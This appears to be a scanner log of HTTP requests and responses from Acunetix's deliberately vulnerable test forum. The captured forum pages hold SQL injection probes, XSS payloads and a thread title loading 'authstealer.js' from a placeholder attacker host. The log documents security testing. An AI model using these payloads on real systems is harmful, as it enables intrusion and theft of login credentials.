<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Weather</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> Weather </div> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Thread</td> <td class="tableheader">Posts</td> <td class="tableheader">Posted by</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=0'>301 Moved Permanently</a></div></td><td>1</td><td>WinstonVup</td><td>3/14/2022 5:30:18 AM</td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;left:10%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showforum.asp?id=2 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 316 bytes. |
GET http://testasp.vulnweb.com/showforum.asp?id=2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:23 GMT Content-Length: 4017 |
| Response Body - size: 4,017 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Miscellaneous</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> Miscellaneous </div> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Thread</td> <td class="tableheader">Posts</td> <td class="tableheader">Posted by</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=0'>ÑайÑ</a></div></td><td>1</td><td>Jamesaidem</td><td>3/13/2022 10:17:25 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=1'>Testing</a></div></td><td>1</td><td> </td><td>3/13/2022 3:11:02 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=2'><script>doSomethingEvil();</script></a></div></td><td>1</td><td> </td><td>3/13/2022 3:31:45 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=3'><script src=http://hackersite.com/authstealer.js> </script>.</a></div></td><td>1</td><td> </td><td>3/13/2022 3:33:39 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=4'><script>alert('Hello')</script></a></div></td><td>1</td><td> </td><td>3/13/2022 3:34:05 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=5'><script>alert('BELLO')</script></a></div></td><td>1</td><td> </td><td>3/13/2022 3:34:42 PM</td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;left:10%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=0 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 178 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:25 GMT Content-Length: 14602 |
| Response Body - size: 14,602 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:27 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>'";'()(NULL</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:27 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>'";'()(NULL</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:27 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>'";'()(NULL</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=1 -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='1' -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="1" -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%' -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%" -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> OR 1=1 -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=2 -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' OR '1'='1' -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='2' -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" OR "1"="1" -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="2" -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> OR 1=1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=2</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' OR '1'='1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='2</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" OR "1"="1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="2</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>) UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>') UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>") UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> ASC -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:13:44 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>o3lppoLN</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 12:05:24 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Call me maybe<script>alert('Beautiful in white)</script> - 202.187.185.168</div><div class='posttext'>HI Maybe<br /></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 12:06:11 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Call me maybe<script>alert('Beautiful in white')</script> - 202.187.185.168</div><div class='posttext'>HI Maybe<br /></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 12:51:58 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Message 1 <script>alert('Hello')</script> - 180.75.245.68</div><div class='posttext'>HELLO<br /></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>hanxuan</b> on 3/13/2022 2:43:15 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>hi - 180.75.236.90</div><div class='posttext'>http://example.com/han.js<br />document.write("I'm coming");</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=1 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:25 GMT Content-Length: 5979 |
| Response Body - size: 5,979 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:27 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>'";'()(NULL</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:12:27 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Message 1 - 180.74.64.218</div><div class='posttext'><script>alert('Hello')</script><br /></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:12:55 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Message 1 - 180.74.64.218</div><div class='posttext'>Message 1<script>alert('Hello')</script></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:13:08 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>111 - 180.74.64.218</div><div class='posttext'>Message 1<script>alert('Hello')</script></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:13:31 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>123 - 180.74.64.218</div><div class='posttext'><script>alert('Hello')</script></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:13:41 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>123 - 180.74.64.218</div><div class='posttext'><script>alert('Hello')</script></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:13:51 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Message 1<script>alert('Hello')</script> - 180.74.64.218</div><div class='posttext'>1232</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=10 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=10 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:26 GMT Content-Length: 4130 |
| Response Body - size: 4,130 bytes. |
